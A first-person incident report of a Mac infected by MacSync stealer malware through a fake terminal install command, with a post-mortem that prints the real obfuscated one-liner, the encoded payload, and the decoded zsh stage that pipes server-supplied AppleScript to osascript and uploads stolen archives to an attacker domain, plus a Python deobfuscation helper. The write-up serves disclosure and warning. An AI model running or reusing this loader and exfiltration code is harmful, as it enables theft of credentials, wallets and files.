If you have been following me on Instagram, or if you had my WhatsApp, you would have known that I have been hacked. After the incident a lot of people have asked me how it happened. I would like to express the incident publicly, so that you know how easy it is to get affected.
# What Happened?
Last Wednesday (08/04/2026), at night, I was looking for cracked software for my Mac, on a famous site. It did have the software. I clicked “Free Download”. And a site opened. The domain name was “josvafiles.com” (I am not linking to it, because it has been taken down). The site had a nice UI, and had an installation command. The installation command started with “GitHub-AppInstaller”. I believed it was a genuine installation command for the software I was looking for.
With no second thoughts, I ran the script on the terminal. And that was the stupidest decision I have made in a long time.
There was nothing. No additional windows. No prompts. Nothing. The script just ran and finished.
Then I went to the site again, clicked the download button again. And it showed me different download options. Even then I did not suspect anything.
# How did I find out?
It was about 1:30am, the next day. My friends on Instagram suddenly sent me a message. I wasn’t asleep. I went in and noticed that there was a scam message sent from my account, just minutes ago. The message was sent to literally everyone in my circle. Someone had got into my account.
I quickly reset my Instagram password. I went in to turn on 2FA; surprisingly, it was already on. I posted a story saying that I was hacked. And I started deleting the messages, one by one. Because I knew that if the message was still there in the morning, at least 50% of the people would fall for it. I deleted as many messages as I could.
Then I noticed that the same message had already been put on my story and posted on my account. I deleted them. The attacker was spamming about the scam on random Instagram reels as well. Fortunately, one of my friends helped me delete those comments quickly.
After finding out the root cause (which I am explaining in the next section), I wiped my Mac for safety reasons. It took about 5 hours to wipe and set up everything again. There were no other options.
The next day, I received suspicious activity on my Google account and my Epic Games account. Hopefully, there was not much damage done there. I quickly reset the passwords, signed out on all devices and made sure everything’s safe. I had 5 or 6 games in my Epic Games account, and that’s not a big deal for me.
# How do you stay safe?
That’s the easiest part.
DO NOT USE CRACK SOFTWARE.
DO NOT RUN RANDOM COMMANDS FROM THE INTERNET WITHOUT CHECKING.
# Post Mortem
After everything, I went back to the command and started digging through.
```zsh
echo "GitHub-AppInstaller: https://dl.github.com/drive-file-stream/GitHubApplicationSetup.dmg" && curl -kfsSL $(echo 'aHR0cDovL2J1cmVhaS5jb20vY3VybC9lZDhlOWVjNjZjNWRhZmFiZTk2YjRlYTgzOTFiMGZmZjUwMDA0YWRhMWE4ZDczOGIwODM4YTFhZGI1NTE3ODBk'|base64 -D)|zsh
```
Don’t be fooled by the “GitHub-AppInstaller”. It’s just an echo. The important part is what comes next.
If you are a cybersecurity nerd or a CTF player, you would immediately notice that there’s a base64-encoded string:
```
aHR0cDovL2J1cmVhaS5jb20vY3VybC9lZDhlOWVjNjZjNWRhZmFiZTk2YjRlYTgzOTFiMGZmZjUwMDA0YWRhMWE4ZDczOGIwODM4YTFhZGI1NTE3ODBk
```
By decoding it, we get:
```
http://bureai.com/curl/ed8e9ec66c5dafabe96b4ea8391b0fff50004ada1a8d738b0838a1adb551780d
```
When we open this URL, a file with a .daily extension will be downloaded. At this point, an antivirus would flag it, as it’s malware. It’s really a zsh script file. The downloaded file contains:
```zsh
#!/bin/zsh
d2057=$(base64 -D <<'PAYLOAD_m128772990130254' | gunzip
H4sIAJBv12kAA91WW2/bNhR+9684VRXDasBIiiJbuahpsAVoUKQdkgYL1hUCLVI2YZnSRLpx0va/
j7JkiZINbC97GV9kHn78zv3Qr1/ZU8btFzEfEEyXGY+SFY8ly/jIgu8DUIuuaQwXNqHfbL5K01b2
do/suCdMsxinQLIlZjw0WPGNccq4pAXLCkIFm3FaHMXZ0tDQMltQBaYkoKc0Ho9jn+AET+npeHpC
ceCdulMnSRLfcZwTTLCLAzLxgqkTeIHakKnvu5PAITolzlm0oM+h4bunDk3ciee5gYcdEo+9ZDo+
9jx/kvhjMtYvJSyloWHLZW5nAqfZbMb47OiF5RWIJfAFzNeAZhIc+HoOck755qRc8apIAS0ACUBo
iddIsiUFz4E/G0i50HswHgQt0NWMcnkGt9kLS1Ns+0cOjG5xrGKVifk53KiYpaAE8OkeHsF1IteP
JhZc5XlKf6fTD0zavjc58sbGHg3KfaTcPwOzDkQfZMylzM9s26wyZZNnjpcsvpRrEpqbfAzzJ/XT
NeAHqGCIuGC5rNKeCvq/9XrX3YRpyb8ExOme5NM1k+D28V/gFaAEDLMsLMX8o9yLZv+1z1JQuSp4
l6eqzF/eP3z8EN3f/HEdmqOR68AbFZvjk/pjWRr09uoxurv+fHdzfR8GmnyVpxkmEVOejgiWFA4P
hIXMUZZTLkQKBeYE0JyuIdCburSaxvMMzLurj79+uq0/Vqd9JU4jwV6qsmi3SpOQWJYxOHhp3O6R
V4gYDprAWFoAUXmvZdwEsStA9K8yIf8+ltXleL7iC1FGE0YtHRxqoQYErgW2LulEmoXOZvc0V1aD
ImJw0WFX8HM1ChubqmtZkggqS81M5a8lr7lb4IakDmQLa0BKYUWljG6h8FZLgDIAhsMO0Uj3FtUM
O6rFKo6pELWDrRxLSZe5DN1G3jhfH8FFqJdgqb4mgzBUieqFpFxlU0ZxRkrrCFGJD7elMhWhC2LB
8tCsXY2zFVex0/ztlFOv38ulT6hH+O3h8x4MQqojMFIPIy6e4R3aB/nPJ9hWyz9OscriZti6QX/a
bgAZtHHZc/wExsH3JvI/9+noT8uZmhqX0xVLifZKaGOl+Tms0sM4oevQZMNux+m7zjSwOhaUeYvK
4bBSdy47R9VoMDVEPQVUsZmNT+qdVtXh7EhTqd6nPRNju7a173ZOOq/edo1GddUfHlrWLlFKaQ6q
4zzVodv2eAPHPWg9nMpFMt4qUV6qttppnh2bO5OuR6hmTGNaQ14stVdpoFE4g58DpbX3v1Ah3xkw
bBVvHjtn0ESkfvwS9je7pdBlXAoAAA==
PAYLOAD_m128772990130254
)
eval "$d2057"
```
Another base64-encoded string. How wonderful!
Base64-decoding it gave non-ASCII output. That can’t be it. I piped the output into a file. Running `file` on it showed that it’s a gzip file. Unzipping the file gave a zsh script with the following content:
```zsh
#!/bin/zsh
daemon_function() {
    # Detach from the terminal: no output, no prompts, nothing for the user to see.
    exec </dev/null
    exec >/dev/null
    exec 2>/dev/null
    local domain="irvineinteriordesigner.com"
    local token="ed8e9ec66c5dafabe96b4ea8391b0fff50004ada1a8d738b0838a1adb551780d"
    local api_key="5190ef1733183a0dc63fb623357f56d6"
    local file="/tmp/osalogging.zip"
    # Stage 2: fetch AppleScript from the server and pipe it straight into osascript.
    if [ $# -gt 0 ]; then
        curl -k -s --max-time 30 \
            -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
            -H "api-key: $api_key" \
            "http://$domain/dynamic?txd=$token&pwd=$1" | osascript
    else
        curl -k -s --max-time 30 \
            -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
            -H "api-key: $api_key" \
            "http://$domain/dynamic?txd=$token" | osascript
    fi
    if [ $? -ne 0 ]; then
        exit 1
    fi
    # The AppleScript stage leaves its loot in $file; nothing to do if it is missing or empty.
    if [[ ! -f "$file" || ! -s "$file" ]]; then
        return 1
    fi
    # Exfiltration: upload the archive in 10MB chunks, retrying each chunk up to 8 times.
    local CHUNK_SIZE=$((10 * 1024 * 1024))
    local MAX_RETRIES=8
    local upload_id=$(date +%s)-$(openssl rand -hex 8 2>/dev/null || echo $RANDOM$RANDOM)
    local total_size
    total_size=$(stat -f %z "$file" 2>/dev/null || stat -c %s "$file")
    if [[ -z "$total_size" || "$total_size" -eq 0 ]]; then
        return 1
    fi
    local total_chunks=$(( (total_size + CHUNK_SIZE - 1) / CHUNK_SIZE ))
    local i=0
    while (( i < total_chunks )); do
        local offset=$((i * CHUNK_SIZE))
        local chunk_size=$CHUNK_SIZE
        (( offset + chunk_size > total_size )) && chunk_size=$((total_size - offset))
        local success=0
        local attempt=1
        while (( attempt <= MAX_RETRIES && success == 0 )); do
            http_code=$(dd if="$file" bs=1 skip=$offset count=$chunk_size 2>/dev/null | \
                curl -k -s -X PUT \
                    --data-binary @- \
                    -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" \
                    -H "api-key: $api_key" \
                    --max-time 180 \
                    -o /dev/null \
                    -w "%{http_code}" \
                    "http://$domain/gate?buildtxd=$token&upload_id=$upload_id&chunk_index=$i&total_chunks=$total_chunks" 2>/dev/null)
            curl_status=$?
            if [[ $curl_status -eq 0 && $http_code -ge 200 && $http_code -lt 300 ]]; then
                success=1
            else
                ((attempt++))
                sleep $((3 + attempt * 2))
            fi
        done
        if (( success == 0 )); then
            return 1
        fi
        ((i++))
    done
    # Clean up the archive once it has been uploaded.
    rm -f "$file"
    return 0
}
# Run the whole thing in the background so the installer command returns immediately.
if daemon_function "$@" & then
    exit 0
else
    exit 1
fi
```
The script contacts a server. The server returns AppleScript code. And this script runs it. If you are curious, you can view the AppleScript code the server returned. I am not including the AppleScript code here, as it’s very long.
The AppleScript code does the following:
- Gains/validates user credentials
- Dumps system and process info
- Steals browser data (cookies, logins, sessions, high-profile extensions)
- Targets crypto wallets (browser + desktop)
- Harvests keychains
- Harvests all files (Documents, Desktop, Downloads)
- Harvests Telegram session data
- Harvests SSH keys, AWS configurations, Kubernetes configurations
- Harvests the Notes database
- Harvests dotfiles
- Backdoors Ledger apps
Once the above script finishes running, all the harvested information is stored in /tmp/osalogging.zip. The zsh script above chunks the zip file into 10MB packets and sends it back to the attacker’s server.
In my case, about 15GB of data and files have been stolen.
This is the MacSync malware. It runs in userland, relies on deliberate user execution and does not spread through the internet by itself.
A lot of my personal stuff has been stolen. My Instagram and Google accounts were compromised (who knows what else got compromised). All because I was not careful. To be honest, this situation was very embarrassing to me.
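The two unwrapping steps from the post-mortem (base64 to a URL, then base64 to gzip to a zsh script) can be automated. This is an added Python example, not code from the post: it finds embedded base64 runs, decodes them, gunzips when the gzip magic is present, and flags curl, pipe-to-shell, pipe-to-osascript and eval in every recovered layer. It runs on a constructed stand-in for the installer chain (placeholder host and token), not on the real command or payload.

```python
import base64, gzip, re, zlib

# A base64 run of 40+ chars, optionally continued across wrapped lines
# (as in the heredoc payload), plus trailing '=' padding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}(?:\n[A-Za-z0-9+/=]+(?=\n|$))*={0,2}")
# Behaviours worth flagging in any recovered layer.
INDICATORS = {
    "curl": re.compile(r"\bcurl\s+-"),
    "pipe-to-shell": re.compile(r"\|\s*(?:zsh|bash|sh)\b"),
    "pipe-to-osascript": re.compile(r"\|\s*osascript\b"),
    "eval": re.compile(r"\beval\b"),
}

def indicators(text):
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def peel(text, depth=0, max_depth=4):
    """Return [(depth, indicators, text), ...]: the input layer, then every layer
    recovered by base64-decoding (and gunzipping) each embedded blob, recursively."""
    layers = [(depth, indicators(text), text)]
    if depth >= max_depth:
        return layers
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0).replace("\n", ""), validate=True)
            if raw[:2] == b"\x1f\x8b":  # gzip magic, as in the .daily file
                raw = gzip.decompress(raw)
            inner = raw.decode("utf-8")
        except (ValueError, OSError, EOFError, zlib.error):
            continue  # not base64, not a valid gzip stream, or not text
        if all(c.isprintable() or c.isspace() for c in inner):
            layers += peel(inner, depth + 1, max_depth)
    return layers

# Constructed stand-in for the installer chain: placeholder host and token,
# not the real infrastructure from the post.
URL = "http://example.invalid/curl/PLACEHOLDER_TOKEN"
INSTALLER = ('echo "GitHub-AppInstaller: https://example.invalid/Setup.dmg" && '
             "curl -kfsSL $(echo '" + base64.b64encode(URL.encode()).decode()
             + "'|base64 -D)|zsh")
STAGE2 = "#!/bin/zsh\ncurl -k -s http://example.invalid/dynamic?txd=PLACEHOLDER | osascript\n"
STAGE1 = ("#!/bin/zsh\nd2057=$(base64 -D <<'PAYLOAD_end' | gunzip\n"
          + base64.b64encode(gzip.compress(STAGE2.encode())).decode()
          + "\nPAYLOAD_end\n)\neval \"$d2057\"\n")

if __name__ == "__main__":
    for sample in (INSTALLER, STAGE1):
        for depth, flags, body in peel(sample):
            print(f"layer {depth} {flags}: {body.splitlines()[0][:70]}")
```

Fed the real installer command and the real .daily file, `peel` yields the same two-layer chains the post-mortem recovered by hand, with the flagged behaviours listed next to each layer.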